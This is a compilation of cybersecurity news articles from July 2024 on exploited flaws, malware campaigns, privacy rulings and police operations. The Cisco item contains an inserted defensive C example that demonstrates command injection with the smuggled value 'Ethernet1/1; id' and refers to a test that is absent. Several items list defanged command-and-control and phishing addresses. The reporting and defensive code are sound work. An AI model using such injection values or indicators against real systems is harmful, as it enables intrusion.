"The [remote code execution] vulnerability in PanelView Plus involves two custom classes that can be abused to upload and load a malicious DLL into the device," security researcher Yuval Gordon said.
"The DoS vulnerability takes advantage of the same custom class to send a crafted buffer that the device is unable to handle properly, thus leading to a DoS."
The list of shortcomings is as follows -
CVE-2023-2071 (CVSS score: 9.8) - An improper input validation vulnerability that allows unauthenticated attackers to achieve remote code execution via crafted malicious packets.
CVE-2023-29464 (CVSS score: 8.2) - An improper input validation vulnerability that allows an unauthenticated threat actor to read data from memory via crafted malicious packets and cause a DoS by sending a packet larger than the buffer size.
Successful exploitation of the twin flaws permits an adversary to execute code remotely or lead to information disclosure or a DoS condition.
While CVE-2023-2071 impacts FactoryTalk View Machine Edition (versions 13.0, 12.0, and prior), CVE-2023-29464 affects FactoryTalk Linx (versions 6.30, 6.20, and prior).
It's worth noting that advisories for the flaws were released by Rockwell Automation on September 12, 2023, and October 12, 2023, respectively. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released its own alerts on September 21 and October 17.
The disclosure comes as unknown threat actors are believed to be exploiting a recently disclosed critical security flaw in HTTP File Server (CVE-2024-23692, CVSS score: 9.8) to deliver cryptocurrency miners and trojans such as Xeno RAT, Gh0st RAT, PlugX, and GoThief, the last of which uses Amazon Web Services (AWS) to steal information from the infected host.
The vulnerability, described as a case of template injection, allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request.
Brazil Halts Meta's AI Data Processing Amid Privacy Concerns
4.7.24
AI
The Hacker News
Brazil's data protection authority, Autoridade Nacional de Proteção de Dados (ANPD), has temporarily banned Meta from processing users' personal data to train the company's artificial intelligence (AI) algorithms.
The ANPD said it found "evidence of processing of personal data based on inadequate legal hypothesis, lack of transparency, limitation of the rights of data subjects, and risks to children and adolescents."
The decision follows the social media giant's update to its terms that allow it to use public content from Facebook, Messenger, and Instagram for AI training purposes.
A recent report published by Human Rights Watch found that LAION-5B, one of the largest image-text datasets used to train AI models, contained links to identifiable photos of Brazilian children, putting them at risk of malicious deepfakes that could place them under even more exploitation and harm.
Brazil has about 102 million active users, making it one of Meta's largest markets. The ANPD noted the Meta update violates the General Personal Data Protection Law (LGPD) and has "the imminent risk of serious and irreparable or difficult-to-repair damage to the fundamental rights of the affected data subjects."
Meta has five working days to comply with the order, or risk facing daily fines of 50,000 reais (approximately $8,808).
In a statement shared with the Associated Press, the company said the policy "complies with privacy laws and regulations in Brazil," and that the ruling is "a step backwards for innovation, competition in AI development and further delays bringing the benefits of AI to people in Brazil."
The social media firm has received similar pushback in the European Union (E.U.), forcing it to pause plans to train its AI models using data from users in the region without getting explicit consent from users.
Last week, Meta's president of global affairs, Nick Clegg, said that the E.U. was losing "fertile ground for innovation" by coming down too hard on tech companies.
Global Police Operation Shuts Down 600 Cybercrime Servers Linked to Cobalt Strike
4.7.24
Crime
The Hacker News
A coordinated law enforcement operation codenamed MORPHEUS has felled close to 600 servers that were used by cybercriminal groups and were part of an attack infrastructure associated with Cobalt Strike.
The crackdown targeted older, unlicensed versions of the Cobalt Strike red teaming framework between June 24 and 28, according to Europol.
Of the 690 IP addresses that were flagged to online service providers in 27 countries as associated with criminal activity, 590 are no longer accessible.
The joint operation, which commenced in 2021, was led by the U.K. National Crime Agency (NCA) and involved authorities from Australia, Canada, Germany, the Netherlands, Poland and the U.S. Officials from Bulgaria, Estonia, Finland, Lithuania, Japan, and South Korea provided additional support.
Cobalt Strike is a popular adversary simulation and penetration testing tool developed by Fortra (formerly Help Systems), offering IT security experts a way to identify weaknesses in security operations and incident responses.
However, as previously observed by Google and Microsoft, cracked versions of the software have found their way into the hands of malicious actors, who have time-and-again abused it for post-exploitation purposes.
According to a recent report from Palo Alto Networks Unit 42, this involves the use of a payload called Beacon, which uses text-based profiles called Malleable C2 to alter the characteristics of Beacon's web traffic in an attempt to avoid detection.
"Although Cobalt Strike is a legitimate piece of software, sadly cybercriminals have exploited its use for nefarious purposes," Paul Foster, director of threat leadership at the NCA, said in a statement.
"Illegal versions of it have helped lower the barrier of entry into cybercrime, making it easier for online criminals to unleash damaging ransomware and malware attacks with little or no technical expertise. Such attacks can cost companies millions in terms of losses and recovery."
The development comes as Spanish and Portuguese law enforcement have arrested 54 people for committing crimes against elderly citizens through vishing schemes by posing as bank employees and tricking them into parting with personal information under the guise of rectifying a problem with their accounts.
The details were then passed on to other members of the criminal network, who would visit the victims' homes unannounced and pressure them into giving away their credit cards, PIN codes, and bank details. Some instances also involved the theft of cash and jewelry.
The criminal scheme ultimately enabled the miscreants to take control of the targets' bank accounts or make unauthorized cash withdrawals from ATMs and other expensive purchases.
"Using a blend of fraudulent phone calls and social engineering, the criminals are responsible for €2,500,000 in losses," Europol said earlier this week.
"The funds were deposited into multiple Spanish and Portuguese accounts controlled by the fraudsters, from where they were funneled into an elaborate money laundering scheme. An extensive network of money mules overseen by specialist members of the organization was used to disguise the origin of the illicit funds."
The arrests also follow similar action undertaken by INTERPOL to dismantle human trafficking rings in several countries, including Laos, where several Vietnamese nationals were lured with promises of high-paying jobs, only to be coerced into creating fraudulent online accounts for financial scams.
"Victims worked 12-hour workdays, extended to 14 hours if they failed to recruit others, and had their documents confiscated," the agency said. "Families were extorted up to USD $10,000 to secure their return to Vietnam."
Last week, INTERPOL said it also seized $257 million worth of assets and froze 6,745 bank accounts following a global police operation spanning 61 countries that was conducted to disrupt online scam and organized crime networks.
The exercise, referred to as Operation First Light, targeted phishing, investment fraud, fake online shopping sites, romance, and impersonation scams. It led to the arrest of 3,950 suspects and identified 14,643 other possible suspects on all continents.
Twilio's Authy App Breach Exposes Millions of Phone Numbers
4.7.24
Incident
The Hacker News
Cloud communications provider Twilio has revealed that unidentified threat actors took advantage of an unauthenticated endpoint in Authy to identify data associated with Authy accounts, including users' cell phone numbers.
The company said it took steps to secure the endpoint to no longer accept unauthenticated requests.
The development comes days after an online persona named ShinyHunters published on BreachForums a database comprising 33 million phone numbers allegedly pulled from Authy accounts.
Authy, owned by Twilio since 2015, is a popular two-factor authentication (2FA) app that adds an additional layer of account security.
"We have seen no evidence that the threat actors obtained access to Twilio's systems or other sensitive data," it said in a July 1, 2024, security alert.
But out of an abundance of caution, it's recommending that users upgrade their Android (version 25.1.0 or later) and iOS (version 26.1.0 or later) apps to the latest version.
It also cautioned that the threat actors may attempt to use the phone number associated with Authy accounts for phishing and smishing attacks.
"We encourage all Authy users to stay diligent and have heightened awareness around the texts they are receiving," it noted.
Microsoft MSHTML Flaw Exploited to Deliver MerkSpy Spyware Tool
4.7.24
Virus
The Hacker News
Unknown threat actors have been observed exploiting a now-patched security flaw in Microsoft MSHTML to deliver a surveillance tool called MerkSpy as part of a campaign primarily targeting users in Canada, India, Poland, and the U.S.
"MerkSpy is designed to clandestinely monitor user activities, capture sensitive information, and establish persistence on compromised systems," Fortinet FortiGuard Labs researcher Cara Lin said in a report published last week.
The starting point of the attack chain is a Microsoft Word document that ostensibly contains a job description for a software engineer role.
But opening the file triggers the exploitation of CVE-2021-40444, a high-severity flaw in MSHTML that could result in remote code execution without requiring any user interaction. It was addressed by Microsoft as part of Patch Tuesday updates released in September 2021.
In this case, it paves the way for the download of an HTML file ("olerender.html") from a remote server that, in turn, initiates the execution of an embedded shellcode after checking the operating system version.
"Olerender.html" takes advantage of "'VirtualProtect' to modify memory permissions, allowing the decoded shellcode to be written into memory securely," Lin explained.
"Following this, 'CreateThread' executes the injected shellcode, setting the stage for downloading and executing the next payload from the attacker's server. This process ensures that the malicious code runs seamlessly, facilitating further exploitation."
The shellcode serves as a downloader for a file that's deceptively titled "GoogleUpdate" but, in reality, harbors an injector payload responsible for evading detection by security software and loading MerkSpy into memory.
The spyware establishes persistence on the host through Windows Registry changes such that it's launched automatically upon system startup. It also comes with capabilities to clandestinely capture sensitive information, monitor user activities, and exfiltrate data to external servers under the threat actors' control.
This includes screenshots, keystrokes, login credentials stored in Google Chrome, and data from the MetaMask browser extension. All this information is transmitted to the URL "45.89.53[.]46/google/update[.]php."
The development comes as Symantec detailed a smishing campaign targeting users in the U.S. with sketchy SMS messages that purport to be from Apple and aim to trick them into clicking on bogus credential harvesting pages ("signin.authen-connexion[.]info/icloud") in order to continue using the services.
"The malicious website is accessible from both desktop and mobile browsers," the Broadcom-owned company said. "To add a layer of perceived legitimacy, they have implemented a CAPTCHA that users must complete. After this, users are directed to a webpage that mimics an outdated iCloud login template."
FakeBat Loader Malware Spreads Widely Through Drive-by Download Attacks
3.7.24
Virus
The Hacker News
The loader-as-a-service (LaaS) known as FakeBat has become one of the most widespread loader malware families distributed using the drive-by download technique this year, findings from Sekoia reveal.
"FakeBat primarily aims to download and execute the next-stage payload, such as IcedID, Lumma, RedLine, SmokeLoader, SectopRAT, and Ursnif," the company said in a Tuesday analysis.
Drive-by attacks entail the use of methods like search engine optimization (SEO) poisoning, malvertising, and nefarious code injections into compromised sites to entice users into downloading bogus software installers or browser updates.
The use of malware loaders over the past few years dovetails with the growing use of landing pages that impersonate legitimate software websites to pass malware off as legitimate installers. This ties into the larger picture in which phishing and social engineering remain among the threat actors' main ways to acquire initial access.
FakeBat, also known as EugenLoader and PaykLoader, has been offered to other cybercriminals under a LaaS subscription model on underground forums by a Russian-speaking threat actor named Eugenfest (aka Payk_34) since at least December 2022.
The loader is designed to bypass security mechanisms and provides customers with options to generate builds using templates to trojanize legitimate software as well as monitor installations over time through an administration panel.
While the earlier versions made use of an MSI format for the malware builds, recent iterations observed since September 2023 have switched to an MSIX format and added a digital signature to the installer with a valid certificate to sidestep Microsoft SmartScreen protections.
The malware is available for $1,000 per week and $2,500 per month for the MSI format, $1,500 per week and $4,000 per month for the MSIX format, and $1,800 per week and $5,000 per month for the combined MSI and signature package.
Sekoia said it detected different activity clusters disseminating FakeBat by three primary approaches: Impersonating popular software through malicious Google ads, fake web browser updates via compromised sites, and social engineering schemes on social networks. This encompasses campaigns likely related to the FIN7 group, Nitrogen, and BATLOADER.
"In addition to hosting payloads, FakeBat [command-and-control] servers highly likely filter traffic based on characteristics such as the User-Agent value, the IP address, and the location," Sekoia said. "This enables the distribution of the malware to specific targets."
The disclosure comes as the AhnLab Security Intelligence Center (ASEC) detailed a malware campaign distributing another loader named DBatLoader (aka ModiLoader and NatsoLoader) through invoice-themed phishing emails.
It also follows the discovery of infection chains propagating Hijack Loader (aka DOILoader and IDAT Loader) via pirated movie download sites to ultimately deliver the Lumma information stealer.
"This IDATLOADER campaign is using a complex infection chain containing multiple layers of direct code-based obfuscation alongside innovative tricks to further hide the maliciousness of the code," Kroll researcher Dave Truman said.
"The infection hinged around utilizing Microsoft's mshta.exe to execute code buried deep within a specially crafted file masquerading as a PGP Secret Key. The campaign made use of novel adaptations of common techniques and heavy obfuscation to hide the malicious code from detection."
Phishing campaigns have further been observed delivering Remcos RAT, with a new Eastern European threat actor dubbed Unfurling Hemlock leveraging loaders and emails to drop binary files that act as a "cluster bomb" to spread different malware strains at once.
"The malware being distributed using this technique is mostly comprised of stealers, such as RedLine, RisePro, and Mystic Stealer, and loaders such as Amadey and SmokeLoader," Outpost24 researcher Hector Garcia said.
"Most of the first stages were detected being sent via email to different companies or being dropped from external sites that were contacted by external loaders."
Israeli Entities Targeted by Cyberattack Using Donut and Sliver Frameworks
3.7.24
Hacking
The Hacker News
Cybersecurity researchers have discovered an attack campaign that targets
various Israeli entities with publicly-available frameworks like Donut and
Sliver.
The campaign, believed to be highly targeted in nature, "leverage target-specific infrastructure and custom WordPress websites as a payload delivery mechanism, but affect a variety of entities across unrelated verticals, and rely on well-known open-source malware," HarfangLab said in a report last week.
The French company is tracking the activity under the name Supposed Grasshopper. It's a reference to an attacker-controlled server ("auth.economy-gov-il[.]com/SUPPOSED_GRASSHOPPER.bin") to which a first-stage downloader connects.
This downloader, written in Nim, is rudimentary and is
tasked with downloading the second-stage malware from the staging server. It's
delivered by means of a virtual hard disk (VHD) file that's suspected to be
propagated via custom WordPress sites as part of a drive-by download scheme.
The second-stage payload retrieved from the server is Donut, a shellcode
generation framework, which serves as a conduit for deploying an open-source
Cobalt Strike alternative called Sliver.
"The operators also put some notable efforts in acquiring dedicated infrastructure and deploying a realistic WordPress website to deliver payloads," the researchers said. "Overall, this campaign feels like it could realistically be the work of a small team."
The end goal of the campaign is currently unknown, although HarfangLab theorized
that it could also be associated with a legitimate penetration testing
operation, a possibility that raises its own set of questions surrounding
transparency and the need for impersonating Israeli government agencies.
The disclosure comes as the SonicWall Capture Labs threat research team detailed an infection chain that employs booby-trapped Excel spreadsheets as a starting point to drop a trojan known as Orcinius.
"This is a multi-stage trojan that is using Dropbox and Google Docs to download second-stage payloads and stay updated," the company said. "It contains an obfuscated VBA macro that hooks into Windows to monitor running windows and keystrokes and creates persistence using registry keys."
South Korean ERP Vendor's Server Hacked to Spread Xctdoor Malware
3.7.24
Virus
The Hacker News
An unnamed South Korean enterprise resource planning (ERP) vendor's product
update server has been found to be compromised to deliver a Go-based backdoor
dubbed Xctdoor.
The AhnLab Security Intelligence Center (ASEC), which identified the attack in May 2024, did not attribute it to a known threat actor or group, but noted that the tactics overlap with that of Andariel, a sub-cluster within the infamous Lazarus Group.
The similarities stem from the North Korean adversary's
prior use of the ERP solution to distribute malware like HotCroissant – which is
identical to Rifdoor – in 2017 by inserting a malicious routine into a software
update program.
In the recent incident analyzed by ASEC, the same executable is said to have
been tampered with to execute a DLL file from a specific path using the
regsvr32.exe process as opposed to launching a downloader.
The DLL file, Xctdoor, is capable of stealing system information, including keystrokes, screenshots, and clipboard content, and executing commands issued by the threat actor.
"Xctdoor communicates with the [command-and-control] server using the HTTP protocol, while the packet encryption employs the Mersenne Twister (MT19937) algorithm and the Base64 algorithm," ASEC said.
Also used in the attack is a malware called XcLoader, which serves as an injector malware responsible for injecting Xctdoor into legitimate processes (e.g., "explorer.exe").
ASEC said it further detected cases where poorly secured web servers have been compromised to install XcLoader since at least March 2024.
The development comes as another North Korea-linked threat actor referred to as Kimsuky has been observed employing a previously undocumented backdoor codenamed HappyDoor that has been put to use as far back as July 2021.
Attack chains distributing the malware leverage spear-phishing emails as a
starting point to disseminate a compressed file, which contains an obfuscated
JavaScript or dropper that, when executed, creates and runs HappyDoor alongside
a decoy file.
HappyDoor, a DLL file executed via regsvr32.exe, is equipped to communicate with a remote server over HTTP and facilitate information theft, download/upload files, as well as update and terminate itself.
It also follows a "massive" malware distribution campaign orchestrated by the Konni cyber espionage group (aka Opal Sleet, Osmium, or TA406) targeting South Korea with phishing lures impersonating the national tax service to deliver malware capable of stealing sensitive information, security researcher Idan Tarab said.
New Intel CPU Vulnerability 'Indirector' Exposes Sensitive Data
2.7.24
Attack
The Hacker News
Modern CPUs from Intel, including Raptor Lake and Alder Lake, have been found
vulnerable to a new side-channel attack that could be exploited to leak
sensitive information from the processors.
The attack, codenamed Indirector by security researchers Luyi Li, Hosein Yavarzadeh, and Dean Tullsen, leverages shortcomings identified in Indirect Branch Predictor (IBP) and the Branch Target Buffer (BTB) to bypass existing defenses and compromise the security of the CPUs.
"The Indirect Branch Predictor (IBP) is a hardware component in modern CPUs that predicts the target addresses of indirect branches," the researchers noted.
"Indirect branches are control flow instructions whose target address is
computed at runtime, making them challenging to predict accurately. The IBP uses
a combination of global history and branch address to predict the target address
of indirect branches."
The idea, at its core, is to identify vulnerabilities in IBP to launch precise
Branch Target Injection (BTI) attacks – aka Spectre v2 (CVE-2017-5715) – which
target a processor's indirect branch predictor to result in unauthorized
disclosure of information to an attacker with local user access via a
side-channel.
This is accomplished by means of a custom tool called iBranch Locator that's used to locate any indirect branch, followed by carrying out precision-targeted IBP and BTB injections to perform speculative execution.
Intel, which was made aware of the findings in February 2024, has since informed other affected hardware/software vendors about the issue.
As mitigations, it's recommended to make use of the Indirect Branch Predictor Barrier (IBPB) more aggressively and harden the Branch Prediction Unit (BPU) design by incorporating more complex tags, encryption, and randomization.
The research comes as Arm CPUs have been found susceptible to a speculative execution attack of their own called TikTag that targets the Memory Tagging Extension (MTE) to leak data with over a 95% success rate in less than four seconds.
The study "identifies new TikTag gadgets capable of leaking the MTE tags from arbitrary memory addresses through speculative execution," researchers Juhee Kim, Jinbum Park, Sihyeon Roh, Jaeyoung Chung, Youngjoo Lee, Taesoo Kim, and Byoungyoung Lee said.
"With TikTag gadgets, attackers can bypass the probabilistic defense of MTE, increasing the attack success rate by close to 100%."
In response to the disclosure, Arm said "MTE can provide a limited set of deterministic first line defenses, and a broader set of probabilistic first line defenses, against specific classes of exploits."
"However, the probabilistic properties are not designed to be a full solution against an interactive adversary that is able to brute force, leak, or craft arbitrary Address Tags."
Meta's 'Pay or Consent' Approach Faces E.U. Competition Rules Scrutiny
2.7.24
Social
The Hacker News
Meta's decision to offer an ad-free subscription in the European Union (E.U.)
has faced a new setback after regulators accused the social media behemoth of
breaching the bloc's competition rules by forcing users to choose between seeing
ads or paying to avoid them.
The European Commission said the company's "pay or consent" advertising model is in contravention of the Digital Markets Act (DMA).
"This binary choice forces users to consent to the combination of their personal data and fails to provide them a less personalized but equivalent version of Meta's social networks," the Commission said.
It also noted that companies in gatekeeper roles must seek users' permission to combine their personal data between designated core platform services and other services (e.g., advertising) and that users who refuse to opt in should have access to a less personalized but equivalent alternative.
On top of that, the Commission said Meta's approach does not allow users to choose a service that uses less of their personal data, and so does not let them exercise their right to freely consent to having their data combined across its services in order to target them with personalized online ads.
"Users who do not consent should still get access to an equivalent service which uses less of their personal data, in this case for the personalisation of advertising," it added.
Meta first announced its plans for an ad-free option to access Facebook and Instagram for users in the E.U., European Economic Area (EEA), and Switzerland in October 2023 as a way to comply with the strict privacy laws in the region.
But in the intervening months, the American tech giant has faced criticism for essentially not offering users a real choice, instead forcing them to either consent to tracking for advertising purposes or pay up every month to avoid seeing personalized ads altogether.
"European users now have the 'choice' to either consent to being tracked for personalized advertising – or pay up to €251.88 a year to retain their fundamental right to data protection on Instagram and Facebook," Austrian privacy non-profit noyb said late last year.
"Not only is the cost unacceptable, but industry numbers suggest that only 3 percent of people want to be tracked – while more than 99 percent decide against a payment when faced with a 'privacy fee.'"
Should the preliminary findings be confirmed, Meta could be fined up to 10% of its total worldwide turnover, a number that can go up to 20% for systematic infringement of the rules.
"Subscription for no ads follows the direction of the highest court in Europe and complies with the DMA," Meta was quoted as saying in a statement shared with the Associated Press. It further said it will engage in "constructive dialogue" with the Commission as part of the investigation.
The development comes as a Norwegian court has confirmed that online dating app Grindr violated GDPR data protection laws in the E.U. by sharing user data with advertisers, requiring it to pay a fine of €5.7 million ($6.1 million).
Chinese Hackers Exploiting Cisco Switches Zero-Day to Deliver Malware
2.7.24
Vulnerability
The Hacker News
A China-nexus cyber espionage group named Velvet Ant has been observed
exploiting a zero-day flaw in Cisco NX-OS Software used in its switches to
deliver malware.
The vulnerability, tracked as CVE-2024-20399 (CVSS score: 6.0), concerns a case of command injection that allows an authenticated, local attacker to execute arbitrary commands as root on the underlying operating system of an affected device.
"By exploiting this vulnerability, Velvet Ant successfully executed a previously unknown custom malware that allowed the threat group to remotely connect to compromised Cisco Nexus devices, upload additional files, and execute code on the devices," cybersecurity firm Sygnia said in a statement shared with The Hacker News.
Cisco said the issue stems from insufficient validation of arguments that are passed to specific configuration CLI commands, which could be exploited by an adversary by including crafted input as the argument of an affected configuration CLI command.
What's more, it enables a user with Administrator privileges to execute commands without triggering system syslog messages, thereby making it possible to conceal the execution of shell commands on hacked appliances.
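The validation failure Cisco describes, an argument to a configuration command reaching a shell unchecked, and the missing syslog record are easiest to see side by side in code. The following C program is an added illustration and is not Cisco's or NX-OS's code: it models a hypothetical configuration-command back end in which the unsafe shape splices the argument into a shell command line, while the hardened path allowlists the argument's characters, writes an audit record to syslog before acting, and invokes a helper binary through execv() with an argv array so no shell ever parses the value. The function names, the helper path and the permitted interface-name character set are assumptions made for this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <syslog.h>
#include <unistd.h>
#include <sys/wait.h>

/* Hypothetical configuration-CLI back end (assumed for this example, not
 * NX-OS code). The "iface" argument arrives from an authenticated
 * administrator session, exactly the position the page describes. */

/* VULNERABLE shape: the argument is spliced into a shell command line, so a
 * value such as "Ethernet1/1; id" turns into two commands once a shell parses
 * it. This function only builds the string; it is never passed to system(). */
int build_shell_command_unsafe(char *out, size_t outlen, const char *iface)
{
    int n = snprintf(out, outlen, "/sbin/ip link set %s up", iface);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* HARDENED step 1: allowlist the exact character set an interface name may
 * contain and bound its length. Anything else is rejected before it reaches
 * any process. Returns 1 if valid, 0 otherwise. */
int is_valid_interface_name(const char *iface)
{
    size_t len = strlen(iface);
    if (len == 0 || len > 32)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)iface[i];
        if (!isalnum(c) && c != '/' && c != '.' && c != '-' && c != '_')
            return 0;
    }
    return 1;
}

/* HARDENED step 2: validated argument, audit record written first, then
 * execv() with an argv array so the value is one argument and never shell
 * text. helper_path is a placeholder for the real configuration tool.
 * Returns the helper's exit status, or -1 if the argument was rejected or
 * the process could not be started. */
int run_interface_command(const char *iface, const char *helper_path)
{
    if (!is_valid_interface_name(iface)) {
        syslog(LOG_AUTHPRIV | LOG_WARNING, "rejected interface argument");
        return -1;
    }
    /* The audit record goes out before the action, so an administrator's
     * shell-level activity is never invisible to central logging. */
    syslog(LOG_AUTHPRIV | LOG_NOTICE, "config command: link set %s up", iface);

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)helper_path, "link", "set",
                               (char *)iface, "up", NULL };
        execv(helper_path, argv);
        _exit(127);               /* only reached if execv() fails */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char cmd[128];
    build_shell_command_unsafe(cmd, sizeof cmd, "Ethernet1/1; id");
    printf("unsafe command line would be: %s\n", cmd);
    /* /bin/echo stands in for the real helper so the demo is harmless. */
    printf("valid argument  -> rc=%d\n", run_interface_command("Ethernet1/1", "/bin/echo"));
    printf("crafted argument -> rc=%d\n", run_interface_command("Ethernet1/1; id", "/bin/echo"));
    return 0;
}
```

The two properties worth checking in a review of any such handler are the ones the test below exercises: the allowlist rejects every string containing a metacharacter or exceeding the length bound, and the rejection happens before any process is spawned. The syslog call on both paths addresses the second half of the finding, that switch-level command execution frequently leaves no record, which is only useful if the device's logs are forwarded to a central collector, as the Sygnia comment later in this article stresses.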
Despite the code execution capabilities of the flaw, the lower severity is due to the fact that successful exploitation requires an attacker to be already in possession of administrator credentials and have access to specific configuration commands. The following devices are impacted by CVE-2024-20399 -
MDS 9000 Series Multilayer Switches
Nexus 3000 Series Switches
Nexus 5500 Platform Switches
Nexus 5600 Platform Switches
Nexus 6000 Series Switches
Nexus 7000 Series Switches, and
Nexus 9000 Series Switches in standalone NX-OS mode
Velvet Ant was first documented by the Israeli cybersecurity firm last month in
connection with a cyber attack targeting an unnamed organization located in East
Asia for a period of about three years by establishing persistence using
outdated F5 BIG-IP appliances in order to stealthily steal customer and
financial information.
"Network appliances, particularly switches, are often not monitored, and their logs are frequently not forwarded to a centralized logging system," Sygnia said. "This lack of monitoring creates significant challenges in identifying and investigating malicious activities."
The development comes as threat actors are exploiting a critical vulnerability affecting D-Link DIR-859 Wi-Fi routers (CVE-2024-0769, CVSS score: 9.8) – a path traversal issue leading to information disclosure – to gather account information such as names, passwords, groups, and descriptions for all users.
"The exploit's variations [...] enable the extraction of account details from the device," threat intelligence firm GreyNoise said. "The product is End-of-Life, so it won't be patched, posing long-term exploitation risks. Multiple XML files can be invoked using the vulnerability."
Australian Man Charged for Fake Wi-Fi Scam on Domestic Flights
2.7.24
Hacking
The Hacker News
An Australian man has been charged with running a fake Wi-Fi access point during
a domestic flight with an aim to steal user credentials and data.
The unnamed 42-year-old "allegedly established fake free Wi-Fi access points, which mimicked legitimate networks, to capture personal data from unsuspecting victims who mistakenly connected to them," the Australian Federal Police (AFP) said in a press release last week.
The agency said the suspect was charged in May 2024 after it launched an investigation a month earlier following a report from an airline about a suspicious Wi-Fi network identified by its employees during a domestic flight.
A subsequent search of his baggage on April 19 led to the seizure of a portable wireless access device, a laptop, and a mobile phone. He was arrested on May 8 after a search warrant was executed at his home.
The individual is said to have staged what's called an evil twin Wi-Fi attack across various locations, including domestic flights and airports in Perth, Melbourne, and Adelaide, to impersonate legitimate Wi-Fi networks.
Users who attempted to connect to the free, phony network were prompted to enter their email address or social media credentials through a captive portal web page.
"The email and password details harvested could be used to access more personal information, including a victim's online communications, stored images and videos, or bank details," the AFP said.
The defendant has been charged with three counts of unauthorized impairment of electronic communication and three counts of possession or control of data with the intent to commit a serious offense.
He has also been charged with one count of unauthorized access or modification of restricted data, one count of dishonestly obtaining or dealing in personal financial information, and one count of possession of identification information. If convicted, he faces up to a maximum of 23 years in prison.
"To connect to a free Wi-Fi network, you shouldn't have to enter any personal details -- such as logging in through an email or social media account," AFP Western Command Cybercrime Detective Inspector Andrea Coleman said.
"If you do want to use public Wi-Fi hotspots, install a reputable virtual private network (VPN) on your devices to encrypt and secure your data when using the internet."
Critical Flaws in CocoaPods Expose iOS and macOS Apps to Supply Chain Attacks
2.7.24
Vulnerability
The Hacker News
A trio of security flaws has been uncovered in the CocoaPods dependency manager
for Swift and Objective-C Cocoa projects that could be exploited to stage
software supply chain attacks, putting downstream customers at severe risks.
The vulnerabilities allow "any malicious actor to claim ownership over thousands of unclaimed pods and insert malicious code into many of the most popular iOS and macOS applications," E.V.A Information Security researchers Reef Spektor and Eran Vaknin said in a report published today.
The Israeli application security firm said the three issues have since been patched by CocoaPods as of October 2023. CocoaPods also reset all user sessions at the time in response to the disclosures.
One of the vulnerabilities is CVE-2024-38368 (CVSS score: 9.3), which makes it possible for an attacker to abuse the "Claim Your Pods" process and take control of a package, effectively allowing them to tamper with the source code and introduce malicious changes. However, this required that all prior maintainers have been removed from the project.
The roots of the problem go back to 2014, when a migration to the Trunk server left thousands of packages with unknown (or unclaimed) owners, permitting an attacker to use a public API for claiming pods and an email address that was available in the CocoaPods source code ("unclaimed-pods@cocoapods.org") to take over control.
The second bug is even more critical (CVE-2024-38366, CVSS
score: 10.0) and takes advantage of an insecure email verification workflow to
run arbitrary code on the Trunk server, which could then be used to manipulate
or replace the packages.
Also identified in the service is a second problem in the email address verification component (CVE-2024-38367, CVSS score: 8.2) that could entice a recipient into clicking on a seemingly-benign verification link, when, in reality, it reroutes the request to an attacker-controlled domain in order to gain access to a developer's session tokens.
Making matters worse, this can be upgraded into a zero-click account takeover attack by spoofing an HTTP header – i.e., modifying the X-Forwarded-Host header field – and taking advantage of misconfigured email security tools.
"We have found that almost every pod owner is registered with their organizational email on the Trunk server, which makes them vulnerable to our zero-click takeover vulnerability," the researchers said.
This is not the first time CocoaPods has come under the scanner. In March 2023, Checkmarx revealed that an abandoned sub-domain associated with the dependency manager ("cdn2.cocoapods[.]org") could have been hijacked by an adversary via GitHub Pages with an aim to host their payloads.
CapraRAT Spyware Disguised as Popular Apps Threatens Android Users
1.7.24
Virus
The Hacker News
The threat actor known as Transparent Tribe has continued to unleash
malware-laced Android apps as part of a social engineering campaign to target
individuals of interest.
"These APKs continue the group's trend of embedding spyware into curated video browsing applications, with a new expansion targeting mobile gamers, weapons enthusiasts, and TikTok fans," SentinelOne security researcher Alex Delamotte said in a new report shared with The Hacker News.
The campaign, dubbed CapraTube, was first outlined by the cybersecurity company in September 2023, with the hacking crew employing weaponized Android apps impersonating legitimate apps like YouTube to deliver a spyware called CapraRAT, a modified version of AndroRAT with capabilities to capture a wide range of sensitive data.
Transparent Tribe, suspected to be of Pakistan origin, has leveraged CapraRAT for over two years in attacks targeting the Indian government and military personnel. The group has a history of leaning into spear-phishing and watering hole attacks to deliver a variety of Windows and Android spyware.
"The activity highlighted in this report shows the continuation of this technique with updates to the social engineering pretexts as well as efforts to maximize the spyware's compatibility with older versions of the Android operating system while expanding the attack surface to include modern versions of Android," Delamotte explained.
The list of new malicious APK files identified by SentinelOne is as follows -
Crazy Game (com.maeps.crygms.tktols)
Sexy Videos (com.nobra.crygms.tktols)
TikToks (com.maeps.vdosa.tktols)
Weapons (com.maeps.vdosa.tktols)
CapraRAT uses WebView to launch a URL to either YouTube or a mobile gaming site
named CrazyGames[.]com, while, in the background, it abuses its permissions to
access locations, SMS messages, contacts, and call logs; make phone calls; take
screenshots; or record audio and video.
A notable change to the malware is that permissions such as READ_INSTALL_SESSIONS, GET_ACCOUNTS, AUTHENTICATE_ACCOUNTS, and REQUEST_INSTALL_PACKAGES are no longer requested, suggesting that the threat actors are aiming to use it as a surveillance tool rather than a backdoor.
"The updates to the CapraRAT code between the September 2023 campaign and the current campaign are minimal, but suggest the developers are focused on making the tool more reliable and stable," Delamotte said.
"The decision to move to newer versions of the Android OS are logical, and likely align with the group's sustained targeting of individuals in the Indian government or military space, who are unlikely to use devices running older versions of Android, such as Lollipop which was released 8 years ago."
The disclosure comes as Promon disclosed a novel type of Android banking malware called Snowblind that, in ways similar to FjordPhantom, attempts to bypass detection methods and make use of the operating system's accessibility services API in a surreptitious manner.
"Snowblind [...] performs a normal repackaging attack but uses a lesser-known technique based on seccomp that is capable of bypassing many anti-tampering mechanisms," the company said.
"Interestingly, FjordPhantom and Snowblind target apps from Southeast Asia and leverage powerful new attack techniques. That seems to indicate that malware authors in that region have become extremely sophisticated."
Indian Software Firm's Products Hacked to Spread Data-Stealing Malware
1.7.24
Virus
The Hacker News
Installers for three different software products developed by an Indian company
named Conceptworld have been trojanized to distribute information-stealing
malware.
